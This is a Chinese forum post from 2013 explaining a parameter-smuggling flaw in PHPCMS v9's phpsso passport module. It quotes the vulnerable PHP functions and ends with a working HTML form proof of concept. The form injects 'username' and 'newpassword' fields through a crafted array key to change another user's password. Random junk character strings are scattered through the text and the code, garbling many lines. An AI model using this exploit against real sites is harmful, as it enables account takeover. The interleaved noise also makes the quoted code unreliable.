提到的通行证的代码:
" [2 W- q+ k$ v# T. _1 L9 e+ j
( D: r; Z& Y3 a: s# N' k
9 Z# R6 S+ ^/ k$ I- aparse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);4 x6 n- Z2 z H- i
8 ?4 D" H4 ]: y% k2 ^
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
* p w8 K7 k% Q& K/ L
" Q9 A/ H9 M6 J7 B, r我把它留给了你们。8 M2 [4 O$ e6 {' y0 l$ J
不知道你们发现了它没有。
' `' A* R* ?7 D, S# V2 l$ O4 H& b1 [ i/ f8 k5 z8 ^. H
我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。9 m! |7 x, Y$ E- z) @
2 R) Q0 V: X; B
所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。8 L T: F1 I! _7 b. H. c. [# W
4 f7 o/ Q; G2 M+ w也就是8 U3 k4 k3 _! [; Y
# W7 s N( w7 R, c, S( y2 L
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。$ p( E; ~1 Y5 J. t
C& G& l7 z9 ]6 \* a; s6 I
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。6 [; G3 W% r* f# \. g3 K2 Z5 I; b
% Q- Y2 e- z' l$ O+ i
- ~3 n8 b3 I) u+ {. M其实我们有这样的机会,看看代码,如下:7 R8 t& p4 `1 Q; J" E
& e) M$ B" B4 y: m! t" e) z2 J% S, k7 q* c8 A; b" h
public function auth_data($data) {+ W! b$ i' {" N2 \$ C5 @
$s = $sep = '';
0 \7 ~3 f! v) I4 {$ I' m foreach($data as $k => $v) {
3 p$ f: d8 I( z# ~- i if(is_array($v)) { q6 ~1 h, B& M; T% k
$s2 = $sep2 = '';
( u2 K! T! L. d8 R foreach($v as $k2 => $v2) {
9 V. y& J( P- g( `0 X $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);& ^) M2 S* {* L1 e" m4 t- w: B- i
$sep2 = '&';
: J& B, U+ {; U: B$ R }
& O/ M( M$ @8 x' t( x $s .= $sep.$s2;* z1 ]: Z/ W. y
} else {- z' f! k: D' {7 D1 D
$s .= "$sep$k=".$this->_ps_stripslashes($v);
2 u7 Y( _' e+ q) s }7 l+ ~. @+ ^: a& }1 A) e
$sep = '&';, m2 _7 H' ?- S) V8 R5 A
}
$ K( c. O+ w$ [/ ^4 e
. h: r0 b% I7 a2 m# o2 I $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
. M( J& F0 z4 G* F" b, A6 ?) X4 j9 h return $auth_s;
) p+ I/ u, M7 R+ |0 T }3 R4 I; Q* ?, K0 ?" @, [
0 K, y I$ F( ?: h( K' ~可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。: H9 G, U- @: X( M) b* F" a
7 e `# b& g3 i8 m2 {6 z8 `2 ]举个例子4 ^9 `3 H8 d. p2 ?) Y( f
3 O* ?9 p; z6 \
$a[aaa=a&bbb] = 'a';4 u9 W4 x; B+ Q; V9 J% i" p7 j" Y
# I2 Z& _+ i9 G0 i( P& c- i# n4 P, R会变成aaa=a&bbb=a
/ J+ ~! L: [+ S) V1 T; ~
& P& U- f* j9 k! J5 I, y* w( ]- Z明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。2 ?8 ~! d4 }; y
$ a2 `9 e5 d0 R U这个时候,我们可以再去看一个函数。
H5 D7 a8 h, |, Z4 Y' n4 j( G, r( x- C6 o: g
就在这个文件内:
* A2 }( X. ~: }* w
6 ~! Z; V% o$ n, M
0 n2 k. j' w2 J, K+ ipublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
y7 F; R4 o2 `0 h J, C if($email && !$this->_is_email($email)) {
6 \+ y. o0 J: z return -4;$ {5 u% q( v% H1 K
}
* v2 f$ |2 {) O* T- f2 v. [4 t return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
" p+ R5 \- M6 D' i }- V( A& Z% D% [1 W6 F
6 E; ?9 @4 G: Y3 L' ~+ g这是向通行证发了这样一个请求。
8 a$ W( D) ^- S$ G9 p( u k# ]% o
' g J$ x' }" t/ s我们再跟到通信证代码里去看看,就会有所发现。
?: C# g2 W) `# L7 j' ]
( m: c" _& H( ~& c; v, z" z
$ r; U) t8 g3 k! C! {public function edit() {
9 d- a- d7 D2 L+ s0 u& n4 L//能省就省,太长了不是吗?* \2 z& A8 K* w, k, J X
7 \% \8 c. \0 J% oif($this->username) {( ^5 f: ?& m M9 N2 ^3 |- A
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。
# o$ V( j- D4 j. c+ E $res = $this->db->update($data, array('username'=>$this->username));
5 o4 m; X* R0 a" [: T/ a; O } else {& E( |/ E. \7 n4 c
file_put_contents('typeb.txt',print_r($data,1).$this->uid);
3 _9 k5 _: m' X( | $res = $this->db->update($data, array('uid'=>$this->uid));. ?8 m% h- V0 o9 q, C
}9 j7 O# w- W. U! m
, s0 t* J: u( I, R6 X; x8 {1 j好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:/ ]7 y- @* [& X
# e! Y; G1 B4 v( n: I
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
' B; v1 s, q6 p& c& L2 Z8 \4 z& L0 v# F9 b8 c5 [& X
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
6 ?# ]- d" }% P5 W$ n1 E, P- z; U+ ^( I$ i
我当然找到了:' K! |- |% o. g" j2 X2 ~9 ]
phpcms9/phpcms/modules/member/index.php
' |8 x) L$ `1 U* e# [
& V+ B7 K% i/ {# e$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);1 u* ^# Z' h% I: w( [, N
0 J. \/ B+ b4 m% I
然后就没有然后了。
+ R0 r& p* F) B: l- u% ^! g
; P3 O* C5 F! ~' w3 M<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
1 j2 s" ^+ }7 B1 G3 Q: i1 ` <table width="100%" cellspacing="0" class="table_form">+ W5 l- Y, O! |3 a0 K! i
<tr>
' Q% X: @* O6 @3 K. L% {6 ~. U5 n <th width="80">邮箱:</th> $ u# ~+ U1 y. b9 ?/ m! v! Z
<td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>. g# A' W; }- W8 E; o8 T- ~' n
</tr>& x3 u `/ j- I- R- d
<tr>3 P9 J# L. d3 Y) d
<th width="80">原密码:</th> # s! G, m c* l
<td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
' k; a; b( _3 l8 O8 P6 j; r, U </tr>
# ^ b; J& ~: E6 H <tr>
6 M' ?: }6 \$ f6 [9 L) i1 X <th>新密码:</th>- Z* f; W9 T( g# h7 g5 o
<td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>- W2 [( Q! ?8 \8 c0 }' x
</tr>
6 N4 z k& H3 s# G <th></th> |! e) i7 T3 B# m
<td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
; S# f1 ?- W' w L* ^' d0 [ </tr>
/ v: X4 @8 u, V( n) p </table>
7 J# {4 i% b e3 n2 O5 X/ D/ u+ P, x
' ^7 W3 v8 U# R5 q( D ]7 K6 B' V" |8 _7 j
</form>1 v" j) X% T ]% U9 i+ j! B
|
发表于 2013-2-23 14:46:35
收藏
支持
反对